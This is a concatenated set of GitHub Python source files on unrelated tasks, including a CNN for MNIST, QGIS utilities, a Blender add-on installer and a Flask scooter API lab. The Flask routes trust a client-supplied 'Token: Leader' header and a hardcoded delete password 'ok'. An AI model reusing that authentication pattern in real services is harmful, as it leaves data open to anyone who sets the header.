NaN, NaN\n    \n    s = math.log(sum(xs)/N) - sum(map(math.log, xs))/N\n    if s != 0:\n        k_hat = (3 - s + math.sqrt( (s-3)**2 + 24*s )) / (12*s) # Approx mle for k\n    else:\n        k_hat = NaN\n    \n    if k_hat != 0:\n        theta_hat = sum(xs) / (N * k_hat)\n    else:\n        theta_hat = NaN\n    \n    return k_hat, theta_hat\n","repo_name":"Harvard-MolSys-Lab/dynamic-workbench","sub_path":"tools/circuit_compiler/myStat.py","file_name":"myStat.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} {"seq_id":"74342974914","text":"import requests\nfrom flask import request, jsonify, render_template\nfrom models.database import db\nfrom models.electro_scooter import ElectroScooter\nfrom __main__ import app\nfrom config import node\n\n\n@app.route('/')\ndef get_docs():\n    print('sending docs')\n    return render_template('swaggerui.html')\n\n\n@app.route('/electro-scooters/<int:scooter_id>', methods=['GET'])\ndef get_electro_scooter_by_id(scooter_id):\n    scooter = ElectroScooter.query.get(scooter_id)\n\n    if scooter is not None:\n        return jsonify({\n            \"id\": scooter.id,\n            \"name\": scooter.name,\n            \"battery_level\": scooter.battery_level\n        }), 200\n    else:\n        return jsonify({\"error\": \"Electro Scooter not found\"}), 404\n\n\n@app.route('/electro-scooters', methods=['GET'])\ndef get_electro_scooters():\n    scooters = ElectroScooter.query.all()\n    response = {}\n    response[\"scooters\"] = []\n\n    if len(scooters) != 0:\n        for scooter in scooters:\n            response[\"scooters\"].append({\n                \"id\": scooter.id,\n                \"name\": scooter.name,\n                \"battery_level\": scooter.battery_level\n            })\n        return jsonify(response), 200\n\n    else:\n        return jsonify({\"error\": \"No Electro Scooters in the database\"}), 404\n\n\n@app.route('/electro-scooters', methods=['POST'])\ndef create_electro_scooter():\n    headers = dict(request.headers)\n    if node.role != 'leader' and (\"Token\" not in headers or headers[\"Token\"] != \"Leader\"):\n        return {\n            \"message\": \"Access denied!\"\n        }, 403\n    else:\n        try:\n            data = request.get_json()\n            name = data['name']\n            battery_level = data['battery_level']\n            electro_scooter = ElectroScooter(name=name, battery_level=battery_level)\n\n            db.session.add(electro_scooter)\n            db.session.commit()\n\n            if node.role == 'leader':\n                for follower in node.followers:\n                    requests.post(f\"http://{follower['host']}:{follower['port']}/electro-scooters\",\n                                  json=request.json,\n                                  headers={\"Token\": \"Leader\"})\n\n            return jsonify({\"message\": \"Electro Scooter created successfully\"}), 201\n        except KeyError:\n            return jsonify({\"error\": \"Invalid request data\"}), 400\n\n\n@app.route('/electro-scooters/<int:scooter_id>', methods=['PUT'])\ndef update_electro_scooter(scooter_id):\n    headers = dict(request.headers)\n    if node.role != 'leader' and (\"Token\" not in headers or headers[\"Token\"] != \"Leader\"):\n        return {\n            \"message\": \"Access denied!\"\n        }, 403\n    else:\n        try:\n            scooter = ElectroScooter.query.get(scooter_id)\n            if scooter is not None:\n                data = request.get_json()\n\n                scooter.name = data.get('name', scooter.name)\n                scooter.battery_level = data.get('battery_level', scooter.battery_level)\n\n                db.session.commit()\n\n                if node.role == 'leader':\n                    for follower in node.followers:\n                        requests.put(f\"http://{follower['host']}:{follower['port']}/electro-scooters/{scooter_id}\",\n                                     json=request.json,\n                                     headers={\"Token\": \"Leader\"})\n\n                return jsonify({\"message\": \"Electro Scooter updated successfully\"}), 200\n            else:\n                return jsonify({\"error\": \"Electro Scooter not found\"}), 404\n        except Exception as e:\n            
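# surface the failure to the caller as an HTTP 500 with the exception text\n            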
return jsonify({\"error\": str(e)}), 500\n\n\n@app.route('/electro-scooters/', methods=['DELETE'])\ndef delete_electro_scooter(scooter_id):\n headers = dict(request.headers)\n if node.role != 'leader' and (\"Token\" not in headers or headers[\"Token\"] != \"Leader\"):\n return {\n \"message\": \"Access denied!\"\n }, 403\n else:\n try:\n scooter = ElectroScooter.query.get(scooter_id)\n if scooter is not None:\n password = request.headers.get('Delete-Password')\n\n if password == 'ok':\n db.session.delete(scooter)\n db.session.commit()\n\n if node.role == 'leader':\n for follower in node.followers:\n requests.delete(f\"http://{follower['host']}:{follower['port']}/electro-scooters/{scooter_id}\",\n headers={\"Token\": \"Leader\", \"Delete-Password\": \"ok\"})\n\n return jsonify({\"message\": \"Electro Scooter deleted successfully\"}), 200\n else:\n return jsonify({\"error\": \"Incorrect password\"}), 401\n else:\n return jsonify({\"error\": \"Electro Scooter not found\"}), 404\n except Exception as e:\n return jsonify({\"error\": str(e)}), 500\n","repo_name":"LY-MC/PR_labs","sub_path":"lab8/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21926979764","text":"from typing import Optional\n\nfrom procedures.examination import is_divided\nfrom structures.graph import Tile, CardinalDirection, Wall\nfrom structures.manager import GeometricTileManager\nfrom structures.navigation import InteriorWallNeighbourhood\n\n\"\"\"\nBasic navigation procedures related to user actions (like changing window focus).\nNot to be confused with the selection module/file, which determines actionable regions for the purpose of manipulations.\n\"\"\"\ndef next_tile(manager: GeometricTileManager, initial: Tile, direction: CardinalDirection) -> Optional[Tile]:\n \"\"\"\n When multiple options are available, option furthest towards the top-left/bottom-right corner will be taken, depend on which corner the input direction faces.\n - This maximises the likelihood that reversing a navigation will reach the previous Tile.\n \"\"\"\n\n candidates = manager.settings.static_config.navigation.tile_neighbourhood(initial)[direction]\n\n if len(candidates) == 0:\n return None\n else:\n return manager.settings.static_config.navigation.tiebreaker(candidates)\n\n\ndef next_undivided_tile(manager: GeometricTileManager, initial: Tile, direction: CardinalDirection) -> Optional[Tile]:\n \"\"\"\n This variant is limited to Tiles whose corners are all each other's nearest neighbours (all tiles, but only empty walls).\n - This matches the most common conditions for focusable content in tiling window managers.\n\n When multiple options are available, option furthest towards the top-left/bottom-right corner will be taken, depend on which corner the input direction faces.\n -This maximises the likelihood that reversing a navigation will reach the previous Tile.\n \"\"\"\n result = next_tile(manager, initial, direction)\n\n if result is None:\n return None\n\n if not initial.is_sentinel and result.is_sentinel:\n #this means we are moving from a Window to find its containing wall, so we want to skip to the next wall, if any\n result = next_tile(manager, result, direction)\n\n if result is None:\n return None\n\n #isinstance actually makes more sense that is_sentinel here\n if isinstance(result, Wall) and is_divided(result):\n candidates = InteriorWallNeighbourhood(result)[direction]\n result = 
manager.settings.static_config.navigation.tiebreaker(candidates)\n\n    return result\n\n","repo_name":"MarcosCosmos/geometric-tile-manager","sub_path":"procedures/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} {"seq_id":"72489842754","text":"import sys\ninput = sys.stdin.readline\n\n# parsing\nn, m = map(int, input().split())\nnums = list(map(int, input().split()))\n\n# remainders\nremain = [0 for _ in range(m)]\nnums[0] %= m\nremain[nums[0]] += 1\n\n# prefix sums and remainder handling\nfor i in range(1, n):\n    nums[i] = (nums[i] + nums[i - 1]) % m\n    remain[nums[i]] += 1\n\n# function that returns nCr (number of combinations)\ndef com(n, r):\n    if r < 0 or n < r:\n        return 0\n    temp = 1\n    for i in range(n, n - r, -1):\n        temp *= i\n    for i in range(1, r + 1):\n        temp = temp // i\n    return temp\n\n# count check\ncount = remain[0]\nfor i in range(m):\n    count += com(remain[i], 2)\n\n# print the result\nprint(count)\n","repo_name":"Lairin-pdj/coding_test","sub_path":"baekjoon/10986_나머지 합.py","file_name":"10986_나머지 합.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} {"seq_id":"39611451262","text":"import json\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndef display_image(image):\n    plt.imshow(image, cmap=\"Greys\")\n    plt.show()\n\nclass NN:\n    def __init__(self, in_width, in_height, filter_width, filter_height, no_filters, pool_width, pool_height, output_size):\n        self.input_size = (in_width, in_height)\n        self.l1_size = (no_filters, in_height - filter_height + 1, in_width - filter_width + 1)\n\n        assert (self.l1_size[2] % pool_width) == 0\n        assert (self.l1_size[1] % pool_height) == 0\n        \n        self.p_size = (no_filters, self.l1_size[1]//pool_height, self.l1_size[2]//pool_width)\n        self.filters = np.zeros([no_filters, filter_height, filter_width])\n        self.filter_width = filter_width \n        self.filter_height = filter_height\n        self.no_filters = no_filters\n        self.pool_width = pool_width\n        self.pool_height = pool_height\n        self.weight_length = self.p_size[0] * self.p_size[1] * self.p_size[2]\n        self.weights = np.zeros([output_size, self.weight_length])\n        self.bias = np.ones([output_size])\n        self.output_size = output_size\n\n    def load_model(self, path):\n        with open(path, \"r\") as file:\n            raw = file.read()\n        nn_values = json.loads(raw)\n        self.filters = np.array(nn_values[\"filters\"])\n        self.weights = np.array(nn_values[\"weights\"])\n        self.bias = np.array(nn_values[\"bias\"])\n        self.p_size = nn_values[\"p_size\"]\n        self.filter_width = nn_values[\"filter_width\"]\n        self.filter_height = nn_values[\"filter_height\"]\n        self.no_filters = nn_values[\"no_filters\"]\n        self.pool_width = nn_values[\"pool_width\"]\n        self.pool_height = nn_values[\"pool_height\"]\n        self.weight_length = nn_values[\"weight_length\"]\n        self.output_size = nn_values[\"output_size\"]\n\n    def save_model(self, path):\n        with open(path, \"w\") as file:\n            nn_values = dict()\n            nn_values[\"filters\"] = self.filters.tolist()\n            nn_values[\"weights\"] = self.weights.tolist()\n            nn_values[\"bias\"] = self.bias.tolist()\n            nn_values[\"p_size\"] = self.p_size \n            nn_values[\"filter_width\"] = self.filter_width \n            nn_values[\"filter_height\"] = self.filter_height \n            nn_values[\"no_filters\"] = self.no_filters\n            nn_values[\"pool_width\"] = self.pool_width \n            nn_values[\"pool_height\"] = self.pool_height\n            nn_values[\"weight_length\"] = self.weight_length\n            nn_values[\"output_size\"] = self.output_size\n            
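# every value stored above is a plain Python type (ndarrays converted via tolist()), so the dict is JSON-serializable\n            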
raw = json.dumps(nn_values)\n file.write(raw)\n\n def set_filters(self, filters):\n assert len(filters) == self.no_filters\n assert len(filters[0]) == self.filter_height\n assert len(filters[0,0]) == self.filter_width\n self.filters = filters\n\n def xavier_init(self):\n weights = np.random.randn(self.output_size, self.weight_length) / self.weight_length\n self.weights = weights\n return weights\n\n def convolute(self, image):\n assert len(image) == self.input_size[0]\n assert len(image[0]) == self.input_size[1]\n\n first_layer = np.zeros(self.l1_size)\n for i, filter in enumerate(self.filters):\n for j in range(self.l1_size[1]):\n for k in range(self.l1_size[2]):\n t = np.tensordot(image[j:j+self.filter_width, k:k+self.filter_height], filter)\n first_layer[i,j,k] = t\n \n self.l1_cache = first_layer[:]\n return first_layer\n\n def pool(self, first_layer):\n pooled = np.zeros(self.p_size)\n for i in range(self.no_filters):\n for j in range(0, self.l1_size[1], self.pool_width):\n for k in range(0, self.l1_size[2], self.pool_height):\n pooled[i,j//self.pool_width,k//self.pool_height] = first_layer[i,j:j+self.pool_height,k:k+self.pool_width].max()\n self.p_cache = pooled\n return pooled\n\n def ff(self, ff_in):\n ff_out = np.zeros(self.output_size)\n flat = ff_in.flatten()\n self.flat_cache = flat\n for i in range(self.output_size):\n ff_out[i] = np.dot(self.weights[i], flat) + self.bias[i]\n self.ff_cache = ff_out\n return ff_out\n\n def soft_max(self, ff_out):\n exps = np.exp(ff_out.astype(np.longdouble))\n exp_sum = np.sum(exps)\n self.output = exps/exp_sum\n return self.output\n\n def feed_forward(self, image, debug=False):\n if debug:\n display_image(image)\n l1 = self.convolute(image)\n if debug:\n for i in l1:\n print(i)\n display_image(i)\n p = self.pool(l1)\n if debug:\n for i in p:\n display_image(i)\n ff_out = self.ff(p)\n if debug:\n print(ff_out)\n predict = self.soft_max(ff_out)\n if debug:\n print(predict)\n return predict\n\n # dL_dout, change in loss in relation to the change in output\n def xel_backprop(self, predict, correct):\n dL_dout = np.zeros([self.output_size])\n dL_dout[correct] = -1/predict[correct]\n self.dL_dout_cache = dL_dout\n return dL_dout\n\n # dout_dt, change in output in relation to change in pre_softmax totals\n def soft_max_backprop(self, ts, c):\n dout_dt = np.zeros([self.output_size])\n t_exp = np.exp(ts.astype(np.longdouble))\n S = np.sum(t_exp)\n\n dout_dt = -t_exp[c] * t_exp / (S ** 2)\n dout_dt[c] = t_exp[c] * (S - t_exp[c]) / (S ** 2)\n \n return dout_dt\n\n def ff_backprop(self, dL_dout, dout_dt):\n dt_dw = self.flat_cache # 676 x 1\n dt_db = 1\n dt_dflat = self.weights # 10 x 676\n dL_dt = np.multiply(dL_dout, dout_dt) # 10 x 1\n \n dL_dw = np.zeros(self.weights.shape) # 10 x 676 \n dL_db = np.zeros(self.output_size) # 10 x 1\n dL_dflat = np.zeros(self.flat_cache.shape) # 676 x 1\n\n dL_db = dL_dt * dt_db\n dL_dflat = dL_dt @ dt_dflat\n dL_dw = np.outer(dL_dt, dt_dw)\n return (dL_db, dL_dflat, dL_dw)\n\n def pool_backprop(self, dL_dflat):\n dL_da1 = np.zeros(self.l1_cache.shape)\n for i in range(self.no_filters):\n for j in range(0, self.l1_size[1], self.pool_width):\n for k in range(0, self.l1_size[2], self.pool_height):\n max_pos = self.l1_cache[i, j:j+self.pool_height,k:k+self.pool_width].argmax()\n max_y = j + max_pos//self.pool_height\n max_x = k + max_pos%self.pool_width\n dL_da1[i, max_y, max_x] = dL_dflat[i+j+k]\n return dL_da1\n\n def conv_backprop(self, image, dL_da1):\n dL_dfilters = np.zeros(self.filters.shape)\n for i in 
range(self.no_filters):\n for y in range(self.filter_height):\n for x in range(self.filter_width):\n dL_dfilters[i,y,x] = (\n image[\n y:self.input_size[1] - self.filter_height + y + 1, \n x:self.input_size[0] - self.filter_width + x + 1\n ] * dL_da1[i] ).sum()\n return dL_dfilters\n\n def back_prop(self, image, predict, correct, rate):\n dL_dout = self.xel_backprop(predict, correct)\n dout_dt = self.soft_max_backprop(self.ff_cache, correct)\n dL_db, dL_dflat, dL_dw = self.ff_backprop(dL_dout, dout_dt)\n self.dL_dw_cache = dL_dw\n self.dL_db_cache = dL_db\n self.weights -= rate * dL_dw\n self.bias -= rate * dL_db\n dL_da1 = self.pool_backprop(dL_dflat)\n dL_dfilters = self.conv_backprop(image, dL_da1)\n self.filters -= rate * dL_dfilters\n\n def train(self, images, labels, rate, early_stop = 0):\n total, epoch_correct, epoch_loss = 0, 0, 0\n for i, (image, label) in enumerate(zip(images, labels)):\n total += 1\n predict = self.feed_forward(image)\n if np.argmax(predict) == label:\n epoch_correct += 1\n epoch_loss += -np.log(predict[label])\n self.back_prop(image, predict, label, rate)\n\n\n if i % 100 == 99:\n print(f\"[Step {total}] Past 100 steps: Avg. Loss {epoch_loss/100} | Accuracy: {epoch_correct}%\")\n epoch_correct = 0\n if epoch_loss < early_stop:\n print(epoch_loss)\n return\n epoch_loss = 0\n\n def test(self, images, labels):\n total, total_correct, epoch_correct, epoch_loss, total_loss = 0, 0, 0, 0, 0\n digit_acc = [0] * 10\n for i, (image, label) in enumerate(zip(images, labels)):\n total += 1\n predict = self.feed_forward(image)\n if np.argmax(predict) == label:\n epoch_correct += 1\n total_correct += 1\n digit_acc[int(label)] += 1\n loss = -np.log(predict[int(label)])\n epoch_loss += loss\n total_loss += loss\n\n if i % 100 == 99:\n print(f\"[Step {total}] Past 100 steps: Avg. Loss {epoch_loss/100} | Accuracy: {epoch_correct}%\")\n epoch_correct = 0\n epoch_loss = 0\n print(f\"[Test Results] All 10000 test steps: Avg. 
Loss {total_loss/len(images)} | Accuracy: {100*total_correct/len(images):.2f}%\")\n \n names, totals = np.unique(labels, return_counts=True)\n values = digit_acc/totals\n sns.set_theme()\n ax = sns.barplot(names, values)\n ax.bar_label(ax.containers[0])\n plt.ylim(0,1)\n plt.title(\"Accuracy of prediction of each digit\")\n plt.show()\n","repo_name":"DavidKing4/MNISTCNN","sub_path":"CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":9801,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"31744575925","text":"#!/usr/bin/env python3\nimport csv\nimport random\n\nwith open (\"/Users/eren/SchoolScripts/users.csv\", 'r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n next(csv_reader)\n\n for line in csv_reader:\n # randomlist = random.sample(range(0, 5), 2)\n # number = str(randomlist[0])+str(randomlist[1])+str(sum(randomlist)) + str(randomlist[1]) + str(randomlist[0]) # Generate Random number for each user.\n printUserEmail = f'{line[\"name.givenName\"]}'\n\n # print(printUserEmail)\n \n # print(f'gam update user {line[\"primaryEmail\"]} password') # Update user mail and password\n # print(f\"gam update group {line['group']} add member {line['e-mail']\") # Update user group\n # print(f'gam update user {line[0]} password {line[0][0:3]}'+'12345')\n # print(f'{line[0]}')\n # print(f'{line[0][0:3]}'+'12345')\n # print(f'{line[0]} -- {line[0][0:3]}'+'12345') # For Teacher\n\n\n\n\n# gam update group samplegroup add member student1@bascs.org\n# gam update user c1 password password12","repo_name":"qreceperen/SchoolScripts","sub_path":"gamCreateEmailCheckDuplicate.py","file_name":"gamCreateEmailCheckDuplicate.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"933100720","text":"__author__ = 'Alexander Bruy'\n__date__ = 'October 2013'\n__copyright__ = '(C) 2013, Alexander Bruy'\n\n# This will get replaced with a git SHA1 when you do a git archive\n\n__revision__ = '$Format:%H$'\n\nimport locale\n\nfrom PyQt4.QtCore import *\n\nfrom qgis.core import *\n\n\ndef getPolygonLayerNames():\n layerMap = QgsMapLayerRegistry.instance().mapLayers()\n layerNames = []\n for name, layer in layerMap.iteritems():\n if layer.type() == QgsMapLayer.VectorLayer \\\n and layer.geometryType() == QGis.Polygon:\n layerNames.append(unicode(layer.name()))\n return sorted(layerNames, cmp=locale.strcoll)\n\n\ndef getRasterLayerNames():\n layerMap = QgsMapLayerRegistry.instance().mapLayers()\n layerNames = []\n for name, layer in layerMap.iteritems():\n if layer.type() == QgsMapLayer.RasterLayer \\\n and layer.providerType() == 'gdal':\n layerNames.append(unicode(layer.name()))\n return sorted(layerNames, cmp=locale.strcoll)\n\n\ndef getVectorLayerByName(layerName):\n layerMap = QgsMapLayerRegistry.instance().mapLayers()\n for name, layer in layerMap.iteritems():\n if layer.type() == QgsMapLayer.VectorLayer \\\n and layer.name() == layerName:\n if layer.isValid():\n return layer\n else:\n return None\n\n\ndef getRasterLayerByName(layerName):\n layerMap = QgsMapLayerRegistry.instance().mapLayers()\n for name, layer in layerMap.iteritems():\n if layer.type() == QgsMapLayer.RasterLayer \\\n and layer.name() == layerName \\\n and layer.providerType() == 'gdal':\n if layer.isValid():\n return layer\n else:\n return None\n\n\ndef mapToPixel(mX, mY, geoTransform):\n if geoTransform[2] + geoTransform[4] == 0:\n pX = (mX - geoTransform[0]) / 
geoTransform[1]\n pY = (mY - geoTransform[3]) / geoTransform[5]\n else:\n (pX, pY) = applyGeoTransform(mX, mY, invertGeoTransform(geoTransform))\n return (int(pX), int(pY))\n\n\ndef pixelToMap(pX, pY, geoTransform):\n (mX, mY) = applyGeoTransform(pX + 0.5, pY + 0.5, geoTransform)\n return (mX, mY)\n\n\ndef applyGeoTransform(inX, inY, geoTransform):\n outX = geoTransform[0] + inX * geoTransform[1] + inY * geoTransform[2]\n outY = geoTransform[3] + inX * geoTransform[4] + inY * geoTransform[5]\n return (outX, outY)\n\n\ndef invertGeoTransform(geoTransform):\n det = geoTransform[1] * geoTransform[5] - geoTransform[2] * geoTransform[4]\n\n if abs(det) < 0.000000000000001:\n return\n\n invDet = 1.0 / det\n\n outGeoTransform = [0, 0, 0, 0, 0, 0]\n outGeoTransform[1] = geoTransform[5] * invDet\n outGeoTransform[4] = -geoTransform[4] * invDet\n\n outGeoTransform[2] = -geoTransform[2] * invDet\n outGeoTransform[5] = geoTransform[1] * invDet\n\n outGeoTransform[0] = (geoTransform[2] * geoTransform[3] - geoTransform[0]\n * geoTransform[5]) * invDet\n outGeoTransform[3] = (-geoTransform[1] * geoTransform[3] + geoTransform[0]\n * geoTransform[4]) * invDet\n\n return outGeoTransform\n","repo_name":"mlt/hypsometry","sub_path":"hypsometryutils.py","file_name":"hypsometryutils.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33916398596","text":"# load desired font for the poster\nimport matplotlib.font_manager as fm\n\ndef findFont(name='Arial'):\n possiblefonts = fm.findSystemFonts()\n return [f for f in possiblefonts if name in f]\nprop = fm.FontProperties(fname='Arial.ttf')\n\n# set the font to that font\nimport matplotlib\nmatplotlib.rcParams['font.family'] = prop.get_name()\n\n# import various tools\nimport glob, os\nimport matplotlib.pyplot as plt, imageio, numpy as np\nfrom PIL import Image\n\ndef poster(string='Missing Person Poster', filename='missing.jpg',\n size=(4.62, 6.93), margin=0, dpi=100):\n\n # define some scales\n xsize = float(size[0])\n ysize = float(size[1])\n aspect = ysize/xsize\n\n # load the image\n image = imageio.imread(filename)\n \n # create the plot\n plt.figure('poster', figsize=size, dpi=dpi)\n a = plt.subplot()\n a.cla()\n plt.setp(a.get_xticklabels(), visible=False)\n plt.setp(a.get_xticklines(), visible=False)\n plt.setp(a.get_yticklabels(), visible=False)\n plt.setp(a.get_yticklines(), visible=False)\n plt.subplots_adjust(left=margin/xsize, right=1.0 - margin/xsize, top=1.0 - margin/ysize, bottom=margin/ysize)\n\n # draw the background image\n a.imshow(image, interpolation='nearest', extent=[0, xsize, 0, ysize])\n\n name = input(\"Enter name of the missing person: \")\n contact = input(\"Enter the name of contact if the missing person is found: \")\n contact = 'PLEASE CONTACT ' + contact + ' IF FOUND'\n contact_nmbr = input(\"Enter contact number: \")\n contact_nmbr = 'Phone Number: +91-' + contact_nmbr\n age = input(\"Age of missing person: \")\n age = 'Age = ' + age\n height = input(\"Height of missing person: \")\n height = 'Height = ' + height\n weight = input(\"Weight of missing person: \")\n weight = 'Weight = ' + weight\n last_seen_location = input(\"Missing person last seen location: \")\n last_seen_location = 'Last seen Location = ' + last_seen_location\n profile_pic = input(\"Enter the name of the image of Missing person: \")\n\n a.text(2.31, 1.4, name.upper(), fontsize=20, ha='center', weight='bold', color='red')\n a.text(2.31, 0.5, contact.upper(), 
fontsize=12, ha='center', weight='bold', color='orangered')\n a.text(2.31, 0.35, contact_nmbr.upper(), fontsize=12, color='orangered', ha='center', weight='bold', va='top')\n a.text(2.31, 0.95, last_seen_location, fontsize=10, color='black', ha='center', weight='bold')\n a.text(2.31, 1.15, age + ' | ' + height + ' | ' + weight, fontsize=10, color='black', ha='center', weight='bold') \n \n filename = string.replace(' ', '').replace('\\n','') + '.png'\n print(\"Saving poster as\", filename)\n plt.savefig(filename)\n plt.draw()\n \n img = Image.open(profile_pic).convert(\"RGBA\")\n img = img.resize((320, 331), Image.ANTIALIAS)\n background = Image.open(\"MissingPersonPoster.png\").convert(\"RGBA\")\n background.paste(img, (71, 166), img)\n background.save('MissingPersonPoster.png',\"PNG\")\n\nposter()","repo_name":"kaustubh2708/Find-Missing-Person","sub_path":"Missing Person Poster/poster.py","file_name":"poster.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"29600161724","text":"import argparse\n\n\nif __name__ == '__main__':\n\n\tparser = argparse.ArgumentParser('Sample Extraction from multisample VCF')\n\n\tparser.add_argument('-i','--vcf',help=\"input vcf file\")\n\tparser.add_argument('-s','--samplename',help=\"sample to extract\")\n\tparser.add_argument('-o','--out',help=\"output file\")\n\n\tglobal opts\n\n\topts = parser.parse_args()\n\n\tvcf = open(opts.vcf,'r')\n\tout = open(opts.out,'w')\n\n\t\n\tfor line in vcf:\n\n\t\tline = line.rstrip()\n\t\tif line.startswith('##'):\n\n\t\t\tout.write(line +'\\n')\n\t\telif line.startswith('#CHROM'):\n\t\t\theader = line.split('\\t')\n\t\t\t\n\t\t\ttry:\n\t\t\t\tsample_header = '\\t'.join(header[:9] + [opts.samplename])\n\t\t\t\tout.write(sample_header +'\\n')\n\t\t\texcept Exception as E:\n\t\t\t\tprint('error: ' + line)\n\t\t\t\traise\n\t\telse:\n\t\t\tvar = line.split('\\t')[:9]\n\t\t\ttry:\n\t\t\t\tsample = line.split('\\t')[header.index(opts.samplename)]\n\t\t\t\tvar = '\\t'.join(var[:9] + [sample])\n\t\t\t\tif sample.startswith('0/0'):\n\t\t\t\t\tcontinue\n\t\t\t\tout.write(var +'\\n')\n\t\t\texcept Exception as E:\n\t\t\t\tprint('error: ' + line)\n\t\t\t\traise\n\tvcf.close()\n\tout.close()\t","repo_name":"urtism/Powercall","sub_path":"scripts/VCF_filter_by_sample.py","file_name":"VCF_filter_by_sample.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72566381954","text":"from vp_detection import VPDetection\r\nimport cv2\r\nimport os\r\nimport matplotlib.pyplot as plt\r\npath='C:/Users/SamSung/Desktop/uni/y4/computer_vision/FD_Item/'\r\nl=os.listdir(path)\r\n#print(l)\r\nfl1=3.42*1000\r\nfl2=3.4082*1000\r\n\r\n# ith image i\r\ni=7\r\n#print(os.listdir(path))\r\n\r\nvp=VPDetection(length_thresh=30,principal_point=None,focal_length=fl1,seed=None)\r\n\r\nimg_path=os.path.join(path,l[i])\r\nimg=cv2.imread(img_path)\r\n\r\nprint('3D space coord:\\n',vp.find_vps(img))\r\nvps_2D=vp.vps_2D\r\nprint('2D image coord:\\n',vps_2D)\r\nx=[j[0] for j in vps_2D]\r\ny=[j[1] for j in vps_2D]\r\n\r\nplt.scatter(x,y,s=6)\r\n\r\nplt.imshow(img)\r\n\r\nplt.show()\r\n","repo_name":"bm43/4th-year-projects","sub_path":"computer_vision/vp.py","file_name":"vp.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34219991870","text":"import 
bpy_extras\nimport platform\nimport sys\nimport bpy\nimport numpy as np\nimport torch\nimport PIL\nimport ssl\nimport os\n\nfrom torch import optim\nfrom torchvision import models, transforms\nfrom time import time\nfrom itertools import chain\nfrom PIL import Image as Img\nfrom bpy.types import Operator, Image\n\nwm = bpy.context.window_manager\nstr_path = \"my_path\"\n\n# execute terminal command and return output\ndef exec(cmd):\n stream = os.popen(cmd)\n output = stream.read()\n print(output)\n\n# install required packages for windows\ndef config_windows():\n print(\"Windows Config\")\n # command(\"\\\"\" + os.path.join(sys.exec_prefix,\n # \"bin\\python.exe\") + \"\\\"\" + \" -m ensurepip\")\n command = \"\\\"\" + os.path.join(sys.exec_prefix,\n \"bin\\python.exe\") + \"\\\"\" + \" -m pip install \" + \"\\\"\" + bpy.utils.user_resource(\n 'SCRIPTS',\n \"addons\") + \"\\\\\" + \"blender-pytorch-style-transfer\\\\windows\" + \"\\\\\" + \"torch-1.5.0-cp37-cp37m-win_amd64.whl\" + \"\\\" --user\"\n command.replace('\\\\', '/')\n exec(command)\n\n command = \"\\\"\" + os.path.join(sys.exec_prefix,\n \"bin\\python.exe\") + \"\\\"\" + \" -m pip install \" + \"\\\"\" + bpy.utils.user_resource(\n 'SCRIPTS',\n \"addons\") + \"\\\\\" + \"blender-pytorch-style-transfer\\\\windows\" + \"\\\\\" + \"torchvision-0.6.0-cp37-cp37m-win_amd64.whl\" + \"\\\" --user\"\n command.replace('\\\\', '/')\n exec(command)\n\n command = \"\\\"\" + os.path.join(sys.exec_prefix,\n \"bin\\python.exe\") + \"\\\"\" + \" -m pip install Pillow --user\"\n command.replace('\\\\', '/')\n exec(command)\n\n# install required packages for linux\ndef config_linux():\n print(\"Linux Config\")\n command = \"\\\"\" + os.path.join(sys.exec_prefix,\n \"bin/python3.7m\") + \"\\\"\" + \" -m ensurepip --user\"\n exec(command)\n command = \"\\\"\" + os.path.join(sys.exec_prefix,\n \"bin/python3.7m\") + \"\\\"\" + \" -m pip install \" + \"\\\"\" + bpy.utils.user_resource(\n 'SCRIPTS',\n \"addons\") + \"/\" + \"blender-pytorch-style-transfer/linux\" + \"/\" + \"torch-1.5.0-cp37-cp37m-linux_x86_64.whl\" + \"\\\" --user\"\n command.replace('\\\\', '/')\n exec(command)\n\n command = \"\\\"\" + os.path.join(sys.exec_prefix,\n \"bin/python3.7m\") + \"\\\"\" + \" -m pip install \" + \"\\\"\" + bpy.utils.user_resource(\n 'SCRIPTS',\n \"addons\") + \"/\" + \"blender-pytorch-style-transfer/linux\" + \"/\" + \"torchvision-0.6.0-cp37-cp37m-linux_x86_64.whl\" + \"\\\" --user\"\n command.replace('\\\\', '/')\n exec(command)\n\n command = \"\\\"\" + os.path.join(sys.exec_prefix,\n \"bin/python3.7m\") + \"\\\"\" + \" -m pip install Pillow --user\"\n command.replace('\\\\', '/')\n exec(command)\n\n\nif platform.system() == \"Windows\":\n config_windows()\n\nif platform.system() == \"Linux\":\n config_linux()\n\n# Class For Textfield to images path's\nclass StyleTransfer_OT_TextField(bpy.types.Operator):\n bl_idname = \"view3d.textfield\"\n bl_label = \"Style Transfer\"\n bl_description = \"implement the Neural-Style algorithm developed by Leon A. Gatys, Alexander S. Ecker and Matthias Bethge. Neural-Style, or Neural-Transfer, allows you to take an image and reproduce it with a new artistic style. 
